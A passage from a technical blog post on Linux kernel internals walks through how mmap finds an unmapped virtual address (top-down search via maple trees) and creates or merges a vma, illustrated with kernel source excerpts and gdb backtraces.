src="https://sam4k.com/content/images/2025/04/our_address.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="480" height="360"></figure><p>In order to find a suitable <code>addr</code> for our new memory mapping, broadly speaking, there&apos;s two general cases for <code>do_mmap()</code> to consider:</p><ul><li>Case A: <code>flags</code> includes <code>MAP_FIXED | MAP_FIXED_NOREPLACE</code> </li><li>Case B: <code>flags</code> doesn&apos;t include <code>MAP_FIXED | MAP_FIXED_NOREPLACE</code> (our case)</li></ul><p>For Case A, the fixed <code>addr</code> specified by the user is passed to <code>mmap_region()</code>. However, the virtual address range spanned by this new mapping (<code>addr</code> to <code>addr + len</code>) might overlap existing ones. The default behaviour is to unmap the overlapped part. If <code>MAP_FIXED_NOREPLACE</code> is set though, <code>do_mmap()</code> will return <code>-EEXIST</code> if the new mapping will end up overlapping any existing ones.</p><p>Otherwise, in case B, the kernel will determine the <code>addr</code>. The value of <code>addr</code> passed by the user is actually used as a hint about where to place the mapping. Note the &quot;hint&quot; <code>addr</code> is page aligned and rounded to a minimum value of <code>mmap_min_addr</code><sup>[1]</sup> by <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1194">round_hint_to_min()</a></code> (which will happen in our case, as <code>addr == 0</code>). </p><p>In either case, <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1923">__get_unmapped_area()</a></code> is called to determine an appropriate <code>addr</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">	/* Obtain the address to map to. we verify (or select) it and ensure
	 * that it represents a valid section of the address space.
	 */
	addr = __get_unmapped_area(file, addr, len, pgoff, flags, vm_flags);
	if (IS_ERR_VALUE(addr))
		return addr;</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1325">mm/mmap.c</a></figcaption></figure><p>To avoid getting to lost in the sauce, we&apos;ll skim over this function. Essentially it does some more sanitisation and checks. This includes another LSM hook (<code>mmap_addr</code>) on the <code>addr</code> yielded at the end of this function, as well as an arch specific check (<code>arch_mmap_check()</code>) which is currently only used by <code>arm</code> and <code>sparc</code>. </p><p>The approach used to get the unmapped area depends on a few factors: </p><ul><li>If its a file, some file types may implement their own method to get an area. </li><li>If it&apos;s a shared anonymous mapping, rather than directly allocating physical memory it actually uses a special shmem (shared memory) file (maybe we&apos;ll touch on this later)</li><li>Finally, if neither case (i.e. <code>MAP_PRIVATE | MAP_ANON</code>), it will use either <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/huge_memory.c#L926">thp_get_unmapped_area_vmflags()</a></code> (if <code>CONFIG_TRANSPARENT_HUGEPAGE=y</code>) or <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1911">mm_get_unmapped_area_vmflags()</a></code> - this is the case we&apos;re interested in!</li></ul><p>Transparent Huge Pages (THPs) are a kernel feature for ... you guessed it! Enabling huge pages, transparently! Currently for anonymous memory mappings and tmpfs/shmem.</p><p>If we recall our <a href="https://sam4k.com/linternals-memory-allocators-part-1/#page-primer">page primer</a>, pages are typically defined as 4KB (<code>0x1000</code> bytes) chunks of physical memory. A &quot;huge page&quot; here is 2M (<code>0x200000</code> bytes) in size. So the tl;dr here is that <code>thp_get_unmapped_area_vmflags()</code> will try and align the <code>addr</code> to a 2M boundary so that it can be used as a huge page automatically (AKA transparently!). It&apos;s okay if this doesn&apos;t make total sense yet, as we&apos;ll cover paging in more detail soon!</p><p>Either way it will end up using <code>mm_get_unmapped_area_vmflags()</code>, so that&apos;s where we&apos;ll go next! Well, briefly. Because this function will then call into an arch specific function depending on if the <code>MMF_TOPDOWN</code> bit is set in our processes&apos; <code>mm-&gt;flags</code>. This determines whether we&apos;ll search from the top or bottom of our address space for an unmapped area.</p><p>On x86_64 this is set, which leads us to <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch_get_unmapped_area_topdown_vmflags()</a></code>:</p><pre><code>(gdb) bt
#0  arch_get_unmapped_area_topdown_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr0=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at arch/x86/kernel/sys_x86_64.c:164
#1  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=&lt;optimized out&gt;, filp=filp@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, 
    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
#2  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:937
#3  thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:926
#4  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=len@entry=4096, 
    pgoff=&lt;optimized out&gt;, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
#5  0xffffffff8124725d in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, addr@entry=0, len=len@entry=4096, 
    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc9000076bee8, uf=0xffffc9000076bef0)
    at mm/mmap.c:1325
#6  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
#7  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc9000076bf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
#8  do_syscall_64 (regs=0xffffc9000076bf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83
#9  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121</code></pre><p>We made it! Okay, let&apos;s dig into how the address is fetched by walking through the function. There are various checks but for brevity I will focus on the addr finding:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">unsigned long
arch_get_unmapped_area_topdown_vmflags(struct file *filp, unsigned long addr0,
			  unsigned long len, unsigned long pgoff,
			  unsigned long flags, vm_flags_t vm_flags)
{
	struct vm_area_struct *vma;
	struct mm_struct *mm = current-&gt;mm;
	unsigned long addr = addr0;
	struct vm_unmapped_area_info info = {};
    
	// SNIP
    
	if (flags &amp; MAP_FIXED)
		return addr;
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></figcaption></figure><p>If <code>MAP_FIXED</code> is set, <code>addr</code> is returned as-is, no questions asked.</p><figure class="kg-card kg-code-card"><pre><code class="language-C">	if (addr) {
		addr &amp;= PAGE_MASK;                              [0]
		if (!mmap_address_hint_valid(addr, len))        [1]
			goto get_unmapped_area;

		vma = find_vma(mm, addr);                       [2]
		if (!vma || addr + len &lt;= vm_start_gap(vma))
			return addr;                            [3]
	}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></figcaption></figure><p>If a hint is set (i.e. <code>addr != 0</code>) then the function will check if that address range is free. It does this by first making sure the <code>addr</code> is page aligned [0] and does <em>another</em> validation check on the <code>addr</code> [1]. The comment for <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/mmap.c#L209">mmap_address_hint_valid()</a></code> does a good job describing why this check is needed!</p><p>To check if the address range our new mapping will use is free, it calls <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2014">find_vma()</a></code> [2] - this function returns the first memory region at or AFTER <code>addr</code> in our <code>mm</code>. If no mapping is returned (<code>!vma</code>) then the address space after <code>addr</code> is free and we&apos;re good to go. </p><p>However, if there is a mapping somewhere at or after <code>addr</code>, we need to make sure it starts AFTER the end of our new mapping. It does this by comparing where our new mapping will end &#xA0;(<code>addr + len</code>) and the start address of the <code>vma</code> (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3513">vm_start_gap(vma)</a></code>; the <code>gap</code> part is because the function factors in any potential padding). If there&apos;s no overlap, our mapping&apos;s area is unmapped and we can use the hint! [3]</p><figure class="kg-card kg-code-card"><pre><code class="language-C">struct vm_unmapped_area_info {
	unsigned long flags;        // informs search behaviour
	unsigned long length;       // length of the mapping in bytes
	unsigned long low_limit;    // lowest vaddr to start at
	unsigned long high_limit;   // highest vaddr to end at
	unsigned long align_mask;   // alignment mask the addr must satisfy
	unsigned long align_offset; // 
	unsigned long start_gap;    // minimum gap required before mapping
};
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3443">include/linux/mm.h</a></figcaption></figure><p>If the hint isn&apos;t valid or overlaps an existing mapping, the function will proceed to the <code>get_unmapped_area</code> label which will populate the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3443">struct vm_unmapped_area_info</a></code>, which describes the properties and constraints of our new mapping. </p><p>Remember, as we&apos;re searching topdown, <code>high_limit</code> defines the start point (base) for our search. So how is this calculated? By default, the function will use the value that is handily stored in <code>mm-&gt;mmap_base</code> (the base user vaddr for topdown allocations). But what is this? </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/04/image.png" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="1434" height="664" srcset="https://sam4k.com/content/images/size/w600/2025/04/image.png 600w, https://sam4k.com/content/images/size/w1000/2025/04/image.png 1000w, https://sam4k.com/content/images/2025/04/image.png 1434w" sizes="(min-width: 720px) 720px"><figcaption>From <a href="https://www.slideshare.net/slideshow/process-address-space-the-way-to-create-virtual-address-page-table-of-userspace-application-251425396/251425396#3">these slides</a> by Adrian Huang</figcaption></figure><p>Let&apos;s remind ourselves of the x86_64 process virtual address space. We can see that <code>mm-&gt;mmap_base</code> sits at the upper end of the address space, just below the stack (and its guard gap). This diagram is the &quot;canonical&quot; address space and assumes a typical 47-bits (out of the 64, on a 64-bit system) are used for the virtual address. </p><p>However, more bits may be used for the virtual address on some systems. So while the implementation defaults to <code>mmap_base</code> as the <code>high_limit</code>, if the hint is outside of this window, then the <code>high_limit</code> will instead be set to the true upper bounds of the user virtual address space (where <code>TASK_SIZE_MAX</code> defines the size virtual user address space). </p><figure class="kg-card kg-code-card"><pre><code class="language-C">	info.high_limit = get_mmap_base(0);
	// SNIP

	/*
	 * If hint address is above DEFAULT_MAP_WINDOW, look for unmapped area
	 * in the full address space.
	 *
	 * !in_32bit_syscall() check to avoid high addresses for x32
	 * (and make it no op on native i386).
	 */
	if (addr &gt; DEFAULT_MAP_WINDOW &amp;&amp; !in_32bit_syscall())
		info.high_limit += TASK_SIZE_MAX - DEFAULT_MAP_WINDOW;
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></figcaption></figure><p>The <code>info</code> structure is then passed to <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1765">vm_unmapped_area(&amp;info)</a></code> which will do the search. As we specify <code>VM_UNMAPPED_AREA_TOPDOWN</code> in <code>flags</code>, it uses the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1714">unmapped_area_topdown(info)</a></code> implementation. </p><p>Using the magic of gdb, we can set a breakpoint to examine the <code>info</code> structure for our program&apos;s mapping to make sure everything aligns with our understanding:</p><pre><code>(gdb) p/x *((struct vm_unmapped_area_info*)info)
$2 = {
  flags = VM_UNMAPPED_AREA_TOPDOWN, 
  length = 0x1000,                  // our mapping len
  low_limit = 0x1000,               // default low_limit
  high_limit = 0x7f4bc62a3000,      // mmap_base (highest bit set is 47)
  align_mask = 0x0, 
  align_offset = 0x0, 
  start_gap = 0x0
}</code></pre><p>Now <code>unmapped_area_topdown()</code> has all the information it needs to search the address space from <code>high_limit</code> to <code>low_limit</code>, looking for a gap that fits our mapping of <code>len</code> (taking into account any alignment or gaps required before the mapping):</p><figure class="kg-card kg-code-card"><pre><code>static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
{
	// SNIP
	VMA_ITERATOR(vmi, current-&gt;mm, 0);
		
	// SNIP
    
	if (vma_iter_area_highest(&amp;vmi, low_limit, high_limit, length))
		return -ENOMEM;

	gap = vma_iter_end(&amp;vmi) - info-&gt;length;
	gap -= (gap - info-&gt;align_offset) &amp; info-&gt;align_mask;
	gap_end = vma_iter_end(&amp;vmi);
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1714">mm/mmap.c</a></figcaption></figure><p>Remember those maples trees we spoke about at the beginning? Well now it&apos;s all going to come in handy! <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L1114">VMA_ITERATOR()</a></code> is a macro used to initialise an iterator, <code>vmi</code>, for iterating (!) the vmas of a process (our <code>current-&gt;mm</code> in this case).</p><p>The main logic is then handled by the handy <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1411">vma_iter_area_highest()</a></code>. This function wraps the advanced maple tree API, <code>mas_empty_area_rev()</code>, to find the first gap (i.e. a range not spanned by a node/vma) of <code>length</code> bytes, working from <code>high_limit</code> down to <code>low_limit</code>. And just like that we&apos;ve done our topdown search!</p><p>There are then some additional checks to make sure it conforms with the supplied <code>info</code> plus some additional error cases but that&apos;s the general gist of it. We did it! That&apos;s how we find an unused virtual address for our mapping ... at least for the default topdown case on an x86_64 system ...</p><p>For context, this is where we are in the callstack at this point:</p><pre><code>#0  0xffffffff81243e86 in unmapped_area_topdown (info=&lt;optimized out&gt;) at mm/mmap.c:1719
#1  vm_unmapped_area (info=info@entry=0xffffc900004b7d80) at mm/mmap.c:1770
#2  0xffffffff81037ce5 in arch_get_unmapped_area_topdown_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr0=0, len=4096, pgoff=0, flags=34, 
    vm_flags=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:219
#3  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=&lt;optimized out&gt;, filp=filp@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, 
    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
#4  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:937
#5  thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:926
#6  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=len@entry=4096, 
    pgoff=&lt;optimized out&gt;, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
#7  0xffffffff8124725d in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, addr@entry=0, len=len@entry=4096, 
    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc900004b7ee8, uf=0xffffc900004b7ef0)
    at mm/mmap.c:1325
#8  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
#9  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900004b7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
#10 do_syscall_64 (regs=0xffffc900004b7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83</code></pre><p>We&apos;re going to head back up to <code>do_mmap()</code> and cover the final bit of logic for the mapping process: <code>mmap_region()</code>. </p><h3 id="mmapregion"><code>mmap_region()</code></h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/this_is_it.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="480" height="360"></figure><figure class="kg-card kg-code-card"><pre><code>	addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1468">mm/mmap.c</a></figcaption></figure><p>Okay! Can you believe we&apos;re still on the first system call of our &quot;simple&quot; program?! There&apos;s not long left now though! We&apos;re back in <code>do_mmap()</code> and the pieces are set:</p><ul><li><code>file</code> is NULL as we&apos;re mapping anonymous memory, not a file, in our address space</li><li><code>addr</code>, as we&apos;ve just painstakingly discovered, now contains a suitable virtual address for our mapping</li><li><code>len</code> is the length of our mapping in bytes</li><li><code>vm_flags</code> has been populated in <code>do_mmap()</code> from a combination of the <code>prot</code> and <code>flags</code> we passed to <code>mmap()</code> as well as the <code>mm-&gt;def_flags</code></li><li><code>pgoff</code> is zero, right? hah, well ... for anonymous <code>MAP_PRIVATE</code> mappings, <code>do_mmap()</code> will set <code>pgoff = addr &gt;&gt; PAGE_SHIFT;</code>. But <code>pgoff</code> is for file offsets, and we&apos;re not mapping a file?! The tl;dr here is this acts as an identifier for anonymous vmas (I&apos;m sure we&apos;ll touch on this later).</li><li><code>uf</code>, the userfault list stuff, is still untouched and probably still out of scope for the post</li></ul><p>Now we&apos;re ready to jump into <code>mmap_region()</code>! The goal of this function is to do the actual &quot;mapping&quot; part of <code>mmap()</code>, which essentially means making sure our mapping (<code>len</code> bytes at <code>addr</code> with <code>vm_flags</code> properties) is represented by a <code>struct vm_area_struct</code> and stored in the <code>mm-&gt;mm_mt</code>. Sounds simple enough, right?</p><p>Well ... as you might expect, there are a lot of cases, edge cases and validation that needs to be done to do this correctly. For now we&apos;ll continue to focus on those relating specifically to anonymous mappings and our case study. </p><figure class="kg-card kg-code-card"><pre><code>unsigned long mmap_region(struct file *file, unsigned long addr,
		unsigned long len, vm_flags_t vm_flags, unsigned long pgoff,
		struct list_head *uf)
{
	struct mm_struct *mm = current-&gt;mm;
	struct vm_area_struct *vma = NULL;
	struct vm_area_struct *next, *prev, *merge;
// SNIP
	VMA_ITERATOR(vmi, mm, addr);</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>Right off the bat we can see the <code>VMA_ITERATOR()</code> macro again, which will be doing a lot of heavy lifting in this function for navigating the <code>mm-&gt;mm_t</code> maple tree. Note that it&apos;s initialised with our <code>addr</code>, so the iterator will be initialised with <code>addr</code> as its index.</p><figure class="kg-card kg-code-card"><pre><code>	/* Check against address space limit. */
	if (!may_expand_vm(mm, vm_flags, len &gt;&gt; PAGE_SHIFT)) {
		unsigned long nr_pages;
		// SNIP     
	}

	/* Unmap any existing mapping in the area */
	error = do_vmi_munmap(&amp;vmi, mm, addr, len, uf, false);
	// SNIP</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>Next we do some housekeeping. First is a check to make sure &quot;the calling process may expand its vm space by the passed number of pages&quot; ( <code>len &gt;&gt; PAGE_SHIFT</code> is a quick way to convert <code>len</code> bytes to the page count equivalent). This involves checking against any resource limits.</p><p>Then, we hit a quirk of <code>MAP_FIXED</code> behaviour we touched one earlier. Notably, when looking for an unmapped area, by default we&apos;ll get an <code>addr</code> that does not overlap any existing mappings for <code>len</code> bytes. However, if <code>MAP_FIXED</code> is passed, it will just use the <code>addr</code> passed by the user (as long as its valid), regardless of overlaps.</p><p>If it does overlap any existing mappings, these will get unmapped. This behaviour is implemented by <code>do_vmi_munmap()</code>, which uses the vma iterator to unmap any vmas whose start address lies in <code>addr</code> to <code>addr + len</code>. Note mappings can be &quot;sealed&quot;<sup><a href="https://www.kernel.org/doc/html/next/userspace-api/mseal.html">[2]</a></sup> and can&apos;t be unmapped like this, causing the current <code>mmap()</code> to fail. </p><figure class="kg-card kg-code-card"><pre><code class="language-C">	next = vma_next(&amp;vmi);
	prev = vma_prev(&amp;vmi);
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>Next, the iterator is used to fetch first vma from where the iterator starts (i.e. the next vma after <code>addr</code>) and the first vma prior to where the iterator stars (i.e. the first vma before <code>addr</code>). <code>mmap_region()</code> will then check the following cases:</p><ul><li>Can we merge the new mapping with the <code>next</code> vma instead of creating a new <code>vma</code>?</li><li>Can we merge the new OR merged mapping with the <code>prev</code> vma?</li><li>Some mappings, denoted by <code>VM_SPECIAL</code>, can&apos;t be merged. </li><li>If no merging is possible, allocate a new <code>vma</code>, initialise it and insert it into the <code>mm-&gt;mm_mt</code> </li></ul><h4 id="vma-merging">VMA Merging</h4><figure class="kg-card kg-code-card"><pre><code>	/* Attempt to expand an old mapping */
	/* Check next */
	if (next &amp;&amp; next-&gt;vm_start == end &amp;&amp; !vma_policy(next) &amp;&amp;
	    can_vma_merge_before(next, vm_flags, NULL, file, pgoff+pglen,
				 NULL_VM_UFFD_CTX, NULL)) {</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>A few things need to be checked to determine if we can expand an existing vma, instead of allocating a new <code>struct vm_area_struct</code> for our new mapping. </p><p>Let&apos;s look at the first case: can we merge the new mapping with the <code>next</code> vma? First, there needs to be a <code>next</code> mapping and it needs to be adjacent to where our new mapping would go (i.e. the end of our new mapping, is the start of <code>next</code>).</p><p>Then <code>!<a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L765">vma_policy(next)</a></code> makes sure <code>next</code> doesn&apos;t have it&apos;s own specific NUMA policy (memory stuff, stored in <code>vma-&gt;vm_policy</code>). Finally <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L813">can_vma_merge_before()</a></code> carries out this remaining checks, which basically involves:</p><ul><li>Checking if the <code>vm_flags</code>, <code>file</code> etc. are compatible. Also, if it has it&apos;s own <code>vma-&gt;vm_ops-&gt;close</code> to be called when the vma is closed, it won&apos;t be merged. </li><li>If <code>next</code> is an anonymous vma cloned from a parent process, it won&apos;t be merged. </li></ul><p>If these checks are passed, <code>next</code> will be expanded to include our new mapping. Either way, similar checks will then be made for <code>prev</code>. If those checks pass, either:</p><ul><li><code>next</code> didn&apos;t merge, in which case we&apos;ll expand <code>prev</code> to include the new mapping</li><li><code>next</code> did merge, in which case <code>prev</code> will be expanded to include the new mapping AND <code>next</code>.</li></ul><p>If these checks fail a vma will be allocated for our new mapping. </p><h4 id="vma-allocation">VMA Allocation</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/lonely.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="256" height="192"></figure><p>So, there&apos;s no one for our mapping to merge with. In this case, a new vma will be allocated, initialised and insert into the <code>mm-&gt;mm_mt</code> tree:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">	vma = vm_area_alloc(mm);                           [0]
	// SNIP

	vma_iter_config(&amp;vmi, addr, end);                  [1]
	vma_set_range(vma, addr, end, pgoff);              [2]
	vm_flags_init(vma, vm_flags);                      [3]
	vma-&gt;vm_page_prot = vm_get_page_prot(vm_flags);    [4]

	if (file) {                                        [5]
		// SNIP
	} else if (vm_flags &amp; VM_SHARED) {                 [6]
		// SNIP
	} else {                                           [7]
		vma_set_anonymous(vma);
	}

	if (map_deny_write_exec(vma, vma-&gt;vm_flags)) {     [8]
		error = -EACCES;
		goto close_and_free_vma;
	}

	/* Allow architectures to sanity-check the vm_flags */
	error = -EINVAL;
	if (!arch_validate_flags(vma-&gt;vm_flags))
		goto close_and_free_vma;

	error = -ENOMEM;
	if (vma_iter_prealloc(&amp;vmi, vma))                  [9]
		goto close_and_free_vma;

	/* Lock the VMA since it is modified after insertion into VMA tree */
	vma_start_write(vma);                              [10]
	vma_iter_store(&amp;vmi, vma);                         [11]
	mm-&gt;map_count++;                                   [12]
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>Most of this is fairly straightforward: we allocate a new <code>struct vm_area_struct</code> [0], update the iterator [1], update the <code>vma</code> start/end/pgoff [2], its flags and protections [3][4].</p><p>Next, there&apos;s some mapping type specific initialisation depending on if its a file-backed [5], shared anonymous [6] or private anonymous mapping [7]. In this case, <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L909">vma_set_anonymous()</a></code> simply sets <code>vma-&gt;vm_ops = NULL</code>. This field being NULL is what determines it as (private) anonymous vma (as seen by the equivalent <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L914">vma_is_anonymous()</a></code> check). </p><p>There is then a security check [8], <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mman.h#L192">map_deny_write_exec()</a></code>, which will prevent the creation of mapping with write and execute permissions if the <code>mm</code> has the <code>MMF_HAS_MDWE</code> flag set (note a similar check is also done by selinux via the <code>mmap_file</code> hook).</p><p>Finally, our <code>vma</code> is ready to be inserted into the <code>mm-&gt;mm_mt</code>, this is done by first preallocating enough nodes for the insertion (store) [9]. </p><p>Then, if <code>CONFIG_PER_VMA_LOCK=y</code>, the per-vma write lock will be taken [10], which acts as a r/w semaphore in practice. This is interesting, because you might notice there is no subsequent <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L740">vma_start_write()</a></code>. That&apos;s because all vma write locks are unlocked automatically when the mmap write lock is released, <a href="https://docs.kernel.org/mm/process_addrs.html#locking">read more here</a>. &#xA0;</p><p>Finally our new mapping is inserted into the <code>mm-&gt;mm_mt</code> tree via the iterator [11], using <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1437">vma_iter_store()</a></code>, and the processes&apos; total mapping count is updated [12].</p><h3 id="final-bits">Final Bits</h3><figure class="kg-card kg-code-card"><pre><code class="language-C">	vm_stat_account(mm, vm_flags, len &gt;&gt; PAGE_SHIFT);
	// SNIP
    
	/*
	 * New (or expanded) vma always get soft dirty status.
	 * Otherwise user-space soft-dirty page tracker won&apos;t
	 * be able to distinguish situation when vma area unmapped,
	 * then new mapped in-place (which must be aimed as
	 * a completely new data area).
	 */
	vm_flags_set(vma, VM_SOFTDIRTY);

	vma_set_page_prot(vma);

	validate_mm(mm);
	return addr;
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>There&apos;s some bits we&apos;ve skipped related to files or huge pages, but eventually we&apos;ll get here to the end of the function (we&apos;re almost there!!). So what&apos;s left to do?</p><p>Some accounting of course! <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L3612">vm_stat_account()</a></code> updates various <code>mm</code> stat fields tracking the types of mappings, including: <code>mm-&gt;total_vm</code> (total pages), <code>mm-&gt;exec_vm</code>, <code>mm-&gt;stack_vm</code> and <code>mm-&gt;data_vm</code> (private, writable, not stack). </p><p>Now, regardless of whether this is a new or expanded vma, the <code>VM_SOFTDIRTY</code> flag is set. Dirty is memory management speech for &quot;this has been modified btw!&quot;. Typically this is in the context of changes to a file in memory that aren&apos;t written to disk yet. Here, if <code>CONFIG_MEM_SOFT_DIRTY=y</code>, is used this bit is set to indicate that that the vma has been modified (as I understand it, the &quot;soft&quot; part means it doesn&apos;t require immediate action by the kernel, but will be checked when the next relevant action is taken). We&apos;ll touch more on what these &quot;actions&quot; are in the next section when we cover paging.</p><p><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L90">vma_set_page_prot()</a></code> will update <code>vma-&gt;vm_page_prot</code> to reflect <code>vma-&gt;vm_flags</code>. Next is <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L322">validate_mm()</a></code>, which is a debugging function that validates the state of the memory mappings. This is only enabled on debug builds with <code>CONFIG_DEBUG_VM_MAPLE_TREE=y</code>.</p><p>And last, but not least, we return the <code>addr</code> of our new mapping, which will propagate back, if all is valid, to the return value of the userspace <code>mmap()</code> call.</p><pre><code>#0  mmap_region (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=140379443372032, len=len@entry=4096, vm_flags=vm_flags@entry=115, 
    pgoff=pgoff@entry=34272325042, uf=uf@entry=0xffffc900006bbef0) at mm/mmap.c:2852
#1  0xffffffff81247544 in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=140379443372032, addr@entry=0, len=len@entry=4096, 
    prot=&lt;optimized out&gt;, prot@entry=3, flags=flags@entry=34, vm_flags=&lt;optimized out&gt;, vm_flags@entry=0, pgoff=&lt;optimized out&gt;, 
    populate=0xffffc900006bbee8, uf=0xffffc900006bbef0) at mm/mmap.c:1468
#2  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
